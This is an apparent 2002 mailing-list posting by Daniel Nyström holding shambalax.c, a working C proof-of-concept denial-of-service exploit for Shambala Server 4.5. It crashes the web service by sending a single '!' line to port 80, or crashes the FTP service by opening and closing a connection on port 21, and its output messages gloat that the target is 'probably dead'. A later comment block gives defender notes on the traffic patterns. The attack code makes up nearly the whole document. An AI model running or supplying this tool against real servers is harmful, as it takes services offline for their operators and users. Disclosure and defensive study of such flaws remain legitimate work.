From: Daniel Nyström (exce_at_netwinder.nu)
Date: Tue Jul 09 2002 - 03:46:42 CDT
DoS exploit for previously discussed issues in Shambala Server 4.5.
--/*********************************** * Daniel Nyström, Telhack 026 Inc. * ***********************************/
/******** shambalax.c ***********************************************************
* *
* PoC exploit for the DoS in Shambala Server 4.5 *
* as described in Telhack 026 Inc. S.A. #3 (BID:4897). *
* I have also built in a function that exploits another *
* DoS condition found by zillion a long long time ago. *
* Also refined my DoS a little bit by just using one *
* char that messes up Shambala. *
* *
* By: Daniel Nyström (excE) <exce
netwinder.nu> *
* *
* *
* Notes: *
* I found that zillion had only been almost right: it *
* is not opening a lot of TCP connections that generates *
* the DoS that he found, it is just one TCP connection, *
* but it certainly has to do with bad connection handling *
* by Shambala. *
* *
* *
* *
* Credits: *
* Zillion <zillion
safemode.org> - for discovering the FTP DoS *
* *
* Greetz: *
* Xenogen <*****
**********.***> - for promising to report any segfaults :) *
* X-Rewt <*****
**********.***> - Cuz he's in my school :P *
* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :)) *
* *
*********************************************************** shambalax.c ********/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/*
 * shambalax: proof-of-concept client for the two denial-of-service
 * conditions that the posting attributes to Shambala Server 4.5.
 *
 * Usage: <prog> <target> <type>. Only the first character of <type> is
 * inspected:
 *   '1'  connect to TCP port 80 and send the three bytes "!\r\n"
 *   '2'  connect to TCP port 21 and close again without sending anything
 *
 * Exit status is 1 on a usage error, a failed name lookup, or a failed
 * socket/connect/send call; otherwise main returns 0.
 *
 * Defender notes:
 *  - Neither path sends credentials and each uses a single TCP connection,
 *    so the conditions are reachable by any host that can open ports 80 or
 *    21 on the server. The page names no fixed release; limiting which
 *    hosts can reach those ports, or retiring the server, is what remains.
 *  - On the wire, type 1 is a request whose entire content is "!" followed
 *    by CRLF, and type 2 is a connection to the FTP port that the client
 *    closes without sending data. A service that stops answering right
 *    after either pattern is the symptom to correlate in logs or captures.
 *  - The program never reads from the socket, so its closing message is an
 *    assumption, not a check that the service actually went down.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in target;
    struct hostent *host;
    int fd;
    int port;
    char type;

    if (argc != 3) {
        fprintf(stderr,
                "\n-- Shambala Server 4.5 DoS exploit --\n"
                "\nUsage: %s <target> <type>"
                "\nTypes:"
                "\n1 - HTTPD DoS"
                "\n2 - FTP DoS\n\n",
                argv[0]);
        return 1;
    }

    printf("\n-- Shambala Server 4.5 DoS exploit --\n\n"
           "-> Starting...\n"
           "->\n");

    host = gethostbyname(argv[1]);
    if (host == NULL) {
        herror("gethostbyname");
        return 1;
    }

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd == -1) {
        perror("socket");
        return 1;
    }

    /* The type is checked only after the lookup and socket() succeeded. */
    type = argv[2][0];
    switch (type) {
    case '1':
        port = 80;      /* HTTPD case */
        break;
    case '2':
        port = 21;      /* FTPD case */
        break;
    default:
        fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
        return 1;
    }

    /* Destination: first address returned by the resolver, chosen port. */
    target.sin_family = AF_INET;
    target.sin_port = htons(port);
    target.sin_addr = *((struct in_addr *)host->h_addr);
    memset(target.sin_zero, 0, sizeof target.sin_zero);

    if (type == '1') {
        printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
    } else {
        printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));
    }
    printf("->\n");

    if (connect(fd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1) {
        perror("connect");
        return 1;
    }

    /* Only the HTTPD case transmits data; the FTPD case just disconnects. */
    if (type == '1') {
        printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");
        printf("->\n");
        if (send(fd, "!\r\n", 3, 0) == -1) {
            perror("send");
            return 1;
        }
    }

    close(fd);

    /* Printed unconditionally: no reply from the server is ever inspected. */
    printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);
    return 0;
}
/* EOF - Shambala Server 4.5 DoS exploit */
/* Daniel Nyström (excE) <exce
netwinder.nu> */